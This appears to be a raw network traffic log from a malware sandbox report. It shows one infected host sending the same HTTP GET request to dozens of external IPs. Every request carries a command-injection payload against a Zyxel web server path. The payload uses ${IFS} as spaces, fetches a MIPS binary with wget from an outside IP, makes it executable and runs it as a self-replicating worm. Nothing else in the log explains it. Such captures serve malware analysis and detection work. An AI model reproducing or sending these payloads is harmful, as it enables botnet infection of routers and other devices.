                                      Jan 14, 2024 15:50:37.075246096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2019192.168.2.145961244.88.64.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075285912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2020192.168.2.1441900180.252.218.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075310946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2021192.168.2.1433444206.198.19.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075364113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2022192.168.2.14447985.122.69.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075525045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2023192.168.2.1451992115.102.45.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075562954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2024192.168.2.1441480171.55.29.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075598955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2025192.168.2.1440186182.224.187.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075640917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2026192.168.2.144723892.234.42.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075666904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2027192.168.2.1457902145.121.41.38443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075714111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2028192.168.2.1438488175.215.78.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075733900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2029192.168.2.1433792188.200.172.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075797081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2030192.168.2.1439640114.170.251.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075817108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2031192.168.2.145300844.148.196.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075887918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2032192.168.2.1444330161.46.123.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075944901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2033192.168.2.1434162125.211.127.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.075975895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2034192.168.2.1444866175.88.137.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076024055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2035192.168.2.1443262196.158.174.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076065063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2036192.168.2.144462062.80.123.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076107979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2037192.168.2.1446060112.67.125.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076150894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2038192.168.2.144890082.219.51.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076208115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2039192.168.2.1448478158.252.123.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076241970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2040192.168.2.1455314111.201.91.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076286077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2041192.168.2.1450034146.137.41.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076317072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2042192.168.2.1454348124.35.215.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076349020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2043192.168.2.1441478104.85.242.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076376915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2044192.168.2.1455624153.84.120.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076415062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2045192.168.2.144950875.157.191.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076453924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2046192.168.2.1458608134.124.140.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076515913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2047192.168.2.144900439.77.231.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076538086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2048192.168.2.143646290.132.59.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076581001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2049192.168.2.144505497.24.168.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076622963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2050192.168.2.14602021.115.180.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076677084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2051192.168.2.145480647.219.177.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076714993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2052192.168.2.1453564188.159.120.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076761007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2053192.168.2.1456368200.203.136.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076798916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2054192.168.2.145032427.79.40.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076839924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2055192.168.2.144964491.161.107.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076872110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2056192.168.2.1457676146.147.63.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076925039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2057192.168.2.143525644.142.197.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076958895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2058192.168.2.14526068.98.247.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.076987028 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2059192.168.2.1435974150.60.2.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077024937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2060192.168.2.143934074.159.18.234443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077054977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2061192.168.2.1456864122.117.217.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077109098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2062192.168.2.144047814.136.229.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077130079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2063192.168.2.1448558107.128.208.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077188969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2064192.168.2.1443518100.226.159.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077230930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2065192.168.2.14521628.158.118.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077255964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2066192.168.2.1437100120.201.208.113443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077315092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2067192.168.2.1446994193.13.5.42443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077326059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2068192.168.2.1458050158.118.223.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077404022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2069192.168.2.1440554186.62.241.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077450037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2070192.168.2.1446806175.128.160.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077496052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2071192.168.2.1437800183.186.71.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077567101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2072192.168.2.1449876171.166.213.247443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077598095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2073192.168.2.145277654.235.4.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077624083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2074192.168.2.1444818162.199.170.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077691078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2075192.168.2.1435648156.107.86.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077714920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2076192.168.2.1448996110.24.25.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077785015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2077192.168.2.145552697.84.235.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077862024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2078192.168.2.1450362217.137.55.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.077898026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2079192.168.2.145626273.40.45.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.084836960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2080192.168.2.1455976162.181.7.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:37.084882021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      2081192.168.2.1445694119.129.114.153443
                                      TimestampBytes transferredDirectionData
